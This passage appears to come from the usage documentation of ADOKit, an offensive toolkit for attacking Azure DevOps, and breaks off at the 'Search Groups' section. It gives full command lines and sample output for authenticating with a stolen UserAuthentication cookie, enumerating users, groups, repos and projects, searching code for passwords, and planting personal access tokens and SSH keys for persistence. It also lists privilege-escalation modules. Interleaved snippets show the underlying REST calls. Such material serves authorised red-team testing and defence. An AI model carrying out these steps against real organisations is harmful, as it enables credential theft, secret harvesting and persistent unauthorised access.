        • getgroupmembers - List all group members for a given group
        • getpermissions - Get the permissions for who has access to a given project
        • Persistence
        • createpat - Create personal access token for user
        • listpat - List personal access tokens for user
        • removepat - Remove personal access token for user
        • createsshkey - Create public SSH key for user
        • listsshkey - List public SSH keys for user
        • removesshkey - Remove public SSH key for user
        • Privilege Escalation
        • addprojectadmin - Add a user to the "Project Administrators" for a given project
        • removeprojectadmin - Remove a user from the "Project Administrators" group for a given project
        • addbuildadmin - Add a user to the "Build Administrators" group for a given project
        • removebuildadmin - Remove a user from the "Build Administrators" group for a given project
        • addcollectionadmin - Add a user to the "Project Collection Administrators" group
        • removecollectionadmin - Remove a user from the "Project Collection Administrators" group
        • addcollectionbuildadmin - Add a user to the "Project Collection Build Administrators" group
        • removecollectionbuildadmin - Remove a user from the "Project Collection Build Administrators" group
        • addcollectionbuildsvc - Add a user to the "Project Collection Build Service Accounts" group
        • removecollectionbuildsvc - Remove a user from the "Project Collection Build Service Accounts" group
        • addcollectionsvc - Add a user to the "Project Collection Service Accounts" group
        • removecollectionsvc - Remove a user from the "Project Collection Service Accounts" group
        • getpipelinevars - Retrieve any pipeline variables used for a given project.
        • getpipelinesecrets - Retrieve the names of any pipeline secrets used for a given project.
        • getserviceconnections - Retrieve the service connections used for a given project.

        Arguments/Options

        • /credential: - credential for authentication (PAT or Cookie). Applicable to all modules.
        • /url: - Azure DevOps URL. Applicable to all modules.
        • /search: - Keyword to search for. Not applicable to all modules.
        • /project: - Project to perform an action for. Not applicable to all modules.
        • /user: - Perform an action against a specific user. Not applicable to all modules.
        • /id: - Used with persistence modules to perform an action against a specific token ID. Not applicable to all modules.
        • /group: - Perform an action against a specific group. Not applicable to all modules.

        Authentication Options

        Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.

        • Stolen Cookie - This will be the UserAuthentication cookie on a user's machine for the .dev.azure.com domain.
        • /credential:UserAuthentication=ABC123
        • Personal Access Token (PAT) - This will be an access token/API key that will be a single string.
        • /credential:apiToken
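        Under the hood, a PAT is sent to the Azure DevOps REST API as the password of an HTTP Basic auth header with an empty username. A hedged sketch of building that header (the token value and the URL in the comment are placeholders):

        ```shell
        PAT="apiToken"  # placeholder token, not a real credential
        # Basic auth with empty username: base64 of ":<PAT>"
        AUTH_HEADER="Authorization: Basic $(printf ':%s' "$PAT" | base64)"
        printf '%s\n' "$AUTH_HEADER"
        # The header would accompany REST calls such as (not executed here):
        #   curl -s -H "$AUTH_HEADER" "https://dev.azure.com/organizationName/_apis/projects?api-version=7.0"
        ```

        ADOKit's /credential: option handles this encoding for you; the sketch only shows what the raw API expects.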

        Module Details Table

        The below table shows the permissions required for each module.

        Attack Scenario Module Special Permissions? Notes
        Recon check No
        Recon whoami No
        Recon listrepo No
        Recon searchrepo No
        Recon listproject No
        Recon searchproject No
        Recon searchcode No
        Recon searchfile No
        Recon listuser No
        Recon searchuser No
        Recon listgroup No
        Recon searchgroup No
        Recon getgroupmembers No
        Recon getpermissions No
        Persistence createpat No
        Persistence listpat No
        Persistence removepat No
        Persistence createsshkey No
        Persistence listsshkey No
        Persistence removesshkey No
        Privilege Escalation addprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation removeprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation addbuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation removebuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation addcollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation removecollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation addcollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation removecollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation addcollectionbuildsvc Yes - Project Collection Administrator, Project Collection Build Administrators or Project Collection Service Accounts
        Privilege Escalation removecollectionbuildsvc Yes - Project Collection Administrator, Project Collection Build Administrators or Project Collection Service Accounts
        Privilege Escalation addcollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation removecollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
        Privilege Escalation getpipelinevars Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
        Privilege Escalation getpipelinesecrets Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
        Privilege Escalation getserviceconnections Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts

        Examples

        Validate Azure DevOps Access

        Use Case

        Perform authentication check to ensure that organization is using Azure DevOps and that provided credentials are valid.

        Syntax

        Provide the check module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.

        ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/organizationName

        ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

        Example Output

        C:\>ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/YourOrganization

        ==================================================
        Module: check
        Auth Type: API Key
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 3/28/2023 3:33:01 PM
        ==================================================


        [*] INFO: Checking if organization provided uses Azure DevOps

        [+] SUCCESS: Organization provided exists in Azure DevOps


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        3/28/23 19:33:02 Finished execution of check

        Whoami

        Use Case

        Get the current user and the user's group memberships

        Syntax

        Provide the whoami module, along with any relevant authentication information and URL. This will output the current user and all of its group memberships.

        ADOKit.exe whoami /credential:apiKey /url:https://dev.azure.com/organizationName

        ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

        Example Output

        C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization

        ==================================================
        Module: whoami
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 11:33:12 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Username | Display Name | UPN
        ------------------------------------------------------------------------------------------------------------------------------------------------------------
        jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com


        [*] INFO: Listing group memberships for the current user


        Group UPN | Display Name | Description
        --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
        [YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
        [TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
        [MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
        [YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.

        4/4/23 15:33:19 Finished execution of whoami

        List Repos

        Use Case

        Discover repositories being used in Azure DevOps instance

        Syntax

        Provide the listrepo module, along with any relevant authentication information and URL. This will output the repository name and URL.

        ADOKit.exe listrepo /credential:apiKey /url:https://dev.azure.com/organizationName

        ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

        Example Output

        C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

        ==================================================
        Module: listrepo
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 3/29/2023 8:41:50 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Name | URL
        -----------------------------------------------------------------------------------
        TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
        MaraudersMap | https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap
        SomeOtherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/SomeOtherRepo
        AnotherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo
        ProjectWithMultipleRepos | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/ProjectWithMultipleRepos
        TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

        3/29/23 12:41:53 Finished execution of listrepo
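Repository enumeration like this corresponds to the documented Azure DevOps Git REST API. The sketch below builds (but does not send) such a request; it shows the public `_apis/git/repositories` endpoint and PAT-as-Basic-auth convention, and is not necessarily the call ADOKit itself makes. The organization, project, and PAT values are placeholders.

```python
import base64
import urllib.request

def repo_list_request(organization: str, project: str, pat: str) -> urllib.request.Request:
    """Build (without sending) a request to the documented Git repositories endpoint."""
    url = (f"https://dev.azure.com/{organization}/{project}"
           "/_apis/git/repositories?api-version=7.0")
    # PATs are sent as HTTP Basic credentials with an empty username.
    token = base64.b64encode(f":{pat}".encode()).decode()
    return urllib.request.Request(url, headers={"Authorization": f"Basic {token}"})

req = repo_list_request("YourOrganization", "TestProject", "apiKeyHere")
print(req.full_url)
```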

        Search Repos

        Use Case

        Search for repositories by repository name in an Azure DevOps instance

        Syntax

        Provide the searchrepo module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.

        ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

        ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

        Example Output

        C:\>ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"test"

        ==================================================
        Module: searchrepo
        Auth Type: API Key
        Search Term: test
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 3/29/2023 9:26:57 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Name | URL
        -----------------------------------------------------------------------------------
        TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
        TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

        3/29/23 13:26:59 Finished execution of searchrepo
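The exact matching logic is not documented here beyond the example, but the output above (a search for "test" returning TestProject2 and TestProject) is consistent with a case-insensitive substring filter over the repository list, which could be sketched as:

```python
def filter_repos(repos, term):
    """Case-insensitive substring match on repository name
    (an assumption, inferred from the example output above)."""
    term = term.lower()
    return [r for r in repos if term in r["name"].lower()]

# Names taken from the listrepo example output earlier in this document.
repos = [{"name": n} for n in
         ("TestProject2", "MaraudersMap", "SomeOtherRepo", "TestProject")]
print([r["name"] for r in filter_repos(repos, "test")])
```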

        List Projects

        Use Case

        Discover projects being used in an Azure DevOps instance

        Syntax

        Provide the listproject module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.

        ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/organizationName

        ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

        Example Output

        C:\>ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/YourOrganization

        ==================================================
        Module: listproject
        Auth Type: API Key
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 7:44:59 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Name | Visibility | URL
        -----------------------------------------------------------------------------------------------------
        TestProject2 | private | https://dev.azure.com/YourOrganization/TestProject2
        MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
        ProjectWithMultipleRepos | private | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos
        TestProject | private | https://dev.azure.com/YourOrganization/TestProject

        4/4/23 11:45:04 Finished execution of listproject
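Project enumeration maps to the organization-level `_apis/projects` endpoint of the public REST API. A sketch of flattening its documented JSON shape into the name/visibility/URL rows shown above (the response body here is a fabricated minimal example, not real data):

```python
import json

def summarize_projects(body: str):
    """Reduce a projects-list response body to (name, visibility, url) rows."""
    return [(p["name"], p["visibility"], p["url"])
            for p in json.loads(body)["value"]]

# Minimal stand-in for GET https://dev.azure.com/{org}/_apis/projects?api-version=7.0
sample = json.dumps({"count": 1, "value": [{
    "name": "TestProject", "visibility": "private",
    "url": "https://dev.azure.com/YourOrganization/_apis/projects/TestProject"}]})
print(summarize_projects(sample))
```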

        Search Projects

        Use Case

        Search for projects by project name in an Azure DevOps instance

        Syntax

        Provide the searchproject module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.

        ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

        ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

        Example Output

        C:\>ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"map"

        ==================================================
        Module: searchproject
        Auth Type: API Key
        Search Term: map
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/4/2023 7:45:30 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Name | Visibility | URL
        -----------------------------------------------------------------------------------------------------
        MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap

        4/4/23 11:45:31 Finished execution of searchproject

        Search Code

        Use Case

        Search for code containing a given keyword in an Azure DevOps instance

        Syntax

        Provide the searchcode module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.

        ADOKit.exe searchcode /credential:apiKey /url:https://dev.azure.com/organizationName /search:password

        ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:password

        Example Output

        C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"password"

        ==================================================
        Module: searchcode
        Auth Type: Cookie
        Search Term: password
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 3/29/2023 3:22:21 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
        |_ Console.WriteLine("PassWord");
        |_ this is some text that has a password in it

        [>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
        |_ Console.WriteLine("PaSsWoRd");

        [*] Match count : 3

        3/29/23 19:22:22 Finished execution of searchcode
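For comparison, the public code-search API is a POST to the `almsearch.dev.azure.com` host with a small JSON body (ADOKit itself may use a different, internal endpoint; the organization name below is a placeholder):

```python
import json

# Documented public code-search endpoint; organization name is a placeholder.
SEARCH_URL = ("https://almsearch.dev.azure.com/YourOrganization"
              "/_apis/search/codesearchresults?api-version=7.0")

def code_search_body(term: str, top: int = 100) -> str:
    """JSON request body: the search text plus a cap on returned results."""
    return json.dumps({"searchText": term, "$top": top})

print(code_search_body("password"))
```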

        Search Files

        Use Case

        Search repositories for files whose file names contain a given keyword in an Azure DevOps instance

        Syntax

        Provide the searchfile module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.

        ADOKit.exe searchfile /credential:apiKey /url:https://dev.azure.com/organizationName /search:azure-pipeline

        ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:azure-pipeline

        Example Output

        C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"test"

        ==================================================
        Module: searchfile
        Auth Type: Cookie
        Search Term: test
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 3/29/2023 11:28:34 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        File URL
        ----------------------------------------------------------------------------------------------------
        https://dev.azure.com/YourOrganization/MaraudersMap/_git/4f159a8e-5425-4cb5-8d98-31e8ac86c4fa?path=/Test.cs
        https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/c1ba578c-1ce1-46ab-8827-f245f54934e9?path=/Test.cs
        https://dev.azure.com/YourOrganization/TestProject/_git/fbcf0d6d-3973-4565-b641-3b1b897cfa86?path=/test.cs

        3/29/23 15:28:37 Finished execution of searchfile

        Create PAT

        Use Case

        Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.

        Syntax

        Provide the createpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, valid-until date, and token value for the PAT created. The name of the PAT will be ADOKit- followed by a random string of 8 characters. The PAT will be valid for 1 year from the date of creation, the maximum that Azure DevOps allows.

        ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

        Example Output

        C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

        ==================================================
        Module: createpat
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 3/31/2023 2:33:09 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        PAT ID | Name | Scope | Valid Until | Token Value
        ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
        8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere

        3/31/23 18:33:10 Finished execution of createpat
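The naming and expiry scheme described above can be sketched as follows. The request-body field names follow the public PAT Lifecycle Management API and are an assumption; ADOKit drives PAT creation through a cookie-authenticated session, which may use a different internal API.

```python
import datetime
import random
import string

def adokit_style_pat_body(today: datetime.date) -> dict:
    """Mimic the scheme above: 'ADOKit-' + 8 random characters, valid one year.
    Field names are assumed from the public PAT Lifecycle Management API."""
    suffix = "".join(random.choices(string.ascii_letters, k=8))
    return {
        "displayName": f"ADOKit-{suffix}",
        "scope": "app_token",
        # One year out, the maximum PAT lifetime Azure DevOps allows.
        # (Naive year bump; a Feb 29 creation date would need special handling.)
        "validTo": today.replace(year=today.year + 1).isoformat(),
        "allOrgs": False,
    }

print(adokit_style_pat_body(datetime.date(2023, 3, 31)))
```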

        List PATs

        Use Case

        List all personal access tokens (PATs) for a given user in an Azure DevOps instance.

        Syntax

        Provide the listpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and valid-until date for all of the user's active PATs.

        ADOKit.exe listpat /credential:apiKey /url:https://dev.azure.com/organizationName

        ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

        Example Output

        C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

        ==================================================
        Module: listpat
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 3/31/2023 2:33:17 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        PAT ID | Name | Scope | Valid Until
        -------------------------------------------------------------------------------------------------------------------------------------------
        9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
        8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM

        3/31/23 18:33:18 Finished execution of listpat

        Remove PAT

        Use Case

        Remove a PAT for a given user in an Azure DevOps instance.

        Syntax

        Provide the removepat module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id: argument. This will output whether the PAT was removed, and then list the user's remaining active PATs.

        ADOKit.exe removepat /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

        ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

        Example Output

        C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:0b20ac58-fc65-4b66-91fe-4ff909df7298

        ==================================================
        Module: removepat
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/3/2023 11:04:59 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.

        PAT ID | Name | Scope | Valid Until
        -------------------------------------------------------------------------------------------------------------------------------------------
        9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM

        4/3/23 15:05:00 Finished execution of removepat
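For reference, the public PAT Lifecycle Management API revokes a token with an HTTP DELETE keyed on the token's authorization ID. The URL shape below is an assumption based on that documented API; ADOKit's own removal path (cookie-authenticated) may differ.

```python
def pat_revoke_url(organization: str, authorization_id: str) -> str:
    """URL to DELETE (with suitable auth) to revoke the PAT with this ID.
    Assumed shape of the public PAT Lifecycle Management endpoint."""
    return (f"https://vssps.dev.azure.com/{organization}"
            f"/_apis/tokens/pats?authorizationId={authorization_id}"
            "&api-version=7.1-preview.1")

print(pat_revoke_url("YourOrganization", "0b20ac58-fc65-4b66-91fe-4ff909df7298"))
```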

        Create SSH Key

        Use Case

        Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.

        Syntax

        Provide the createsshkey module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey: argument. This will output the SSH key ID, name, scope, valid-until date, and last 20 characters of the public SSH key for the SSH key created. The name of the SSH key will be ADOKit- followed by a random string of 8 characters. The SSH key will be valid for 1 year from the date of creation, the maximum that Azure DevOps allows.

        ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /sshkey:"ssh-rsa ABC123"

        Example Output

        C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh-rsa ABC123"

        ==================================================
        Module: createsshkey
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/3/2023 2:51:22 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        SSH Key ID | Name | Scope | Valid Until | Public SSH Key
        -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
        fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=

        4/3/23 18:51:24 Finished execution of createsshkey

        List SSH Keys

        Use Case

        List all public SSH keys for a given user in an Azure DevOps instance.

        Syntax

        Provide the listsshkey module, along with any relevant authentication information and URL. This will output the SSH key ID, name, scope, and valid-until date for all of the user's active SSH keys. Additionally, it will print the last 20 characters of each public SSH key.

        ADOKit.exe listsshkey /credential:apiKey /url:https://dev.azure.com/organizationName

        ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

        Example Output

        C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

        ==================================================
        Module: listsshkey
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/3/2023 11:37:10 AM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        SSH Key ID | Name | Scope | Valid Until | Public SSH Key
        -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
        ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

        4/3/23 15:37:11 Finished execution of listsshkey

        Remove SSH Key

        Use Case

        Remove an SSH key for a given user in an Azure DevOps instance.

        Syntax

        Provide the removesshkey module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id: argument. This will output whether the SSH key was removed, and then list the user's remaining active SSH keys.

        ADOKit.exe removesshkey /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

        ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

        Example Output

        C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:a199c036-d7ed-4848-aae8-2397470aff97

        ==================================================
        Module: removesshkey
        Auth Type: Cookie
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/3/2023 1:50:08 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.


        [+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.

        SSH Key ID | Name | Scope | Valid Until | Public SSH Key
        -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
        ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

        4/3/23 17:50:09 Finished execution of removesshkey

        List Users

        Use Case

        List users within an Azure DevOps instance

        Syntax

        Provide the listuser module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.

        ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/organizationName

        ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

        Example Output

        C:\>ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/YourOrganization

        ==================================================
        Module: listuser
        Auth Type: API Key
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/3/2023 4:12:07 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Username | Display Name | UPN
        ------------------------------------------------------------------------------------------------------------------------------------------------------------
        user1 | User 1 | user1@YourOrganization.onmicrosoft.com
        jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com
        rsmith | Ron Smith | rsmith@YourOrganization.onmicrosoft.com
        user2 | User 2 | user2@YourOrganization.onmicrosoft.com

        4/3/23 20:12:08 Finished execution of listuser
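User enumeration corresponds to the Graph API, which lives on the `vssps.dev.azure.com` host rather than `dev.azure.com`. A sketch of the documented endpoint and of flattening its response into the display-name/UPN rows shown above (field names follow the public Graph response shape; the sample body is fabricated for illustration):

```python
import json

def graph_users_url(organization: str) -> str:
    """The documented Graph users endpoint (note the vssps host)."""
    return (f"https://vssps.dev.azure.com/{organization}"
            "/_apis/graph/users?api-version=7.0-preview.1")

def summarize_users(body: str):
    """Reduce a graph/users response to (display name, UPN) rows."""
    return [(u["displayName"], u["principalName"])
            for u in json.loads(body)["value"]]

# Fabricated minimal response for illustration.
sample = json.dumps({"value": [
    {"displayName": "John Smith",
     "principalName": "jsmith@YourOrganization.onmicrosoft.com"}]})
print(summarize_users(sample))
```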

        Search User

        Use Case

        Search for given user(s) in an Azure DevOps instance

        Syntax

        Provide the searchuser module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.

        ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/organizationName /search:user

        ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:user

        Example Output

        C:\>ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"user"

        ==================================================
        Module: searchuser
        Auth Type: API Key
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/3/2023 4:12:23 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        Username | Display Name | UPN
        ------------------------------------------------------------------------------------------------------------------------------------------------------------
        user1 | User 1 | user1@YourOrganization.onmicrosoft.com
        user2 | User 2 | user2@YourOrganization.onmicrosoft.com

        4/3/23 20:12:24 Finished execution of searchuser

        List Groups

        Use Case

        List groups within an Azure DevOps instance

        Syntax

        Provide the listgroup module, along with any relevant authentication information and URL. This will output the user principal name, display name, and description of each group.

        ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/organizationName

        ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

        Example Output

        C:\>ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization

        ==================================================
        Module: listgroup
        Auth Type: API Key
        Search Term:
        Target URL: https://dev.azure.com/YourOrganization

        Timestamp: 4/3/2023 4:48:45 PM
        ==================================================


        [*] INFO: Checking credentials provided

        [+] SUCCESS: Credentials provided are VALID.

        UPN | Display Name | Description
        ------------------------------------------------------------------------------------------------------------------------------------------------------------
        [TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
        [TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
        [YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
        [ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
        [MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
        [YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
        [MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
        [TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
        [YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
        [TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management


        ---SNIP---

        4/3/23 20:48:46 Finished execution of listgroup

        Search Groups

        Use Case

        Search for given group(s) in an Azure DevOps instance

        Syntax

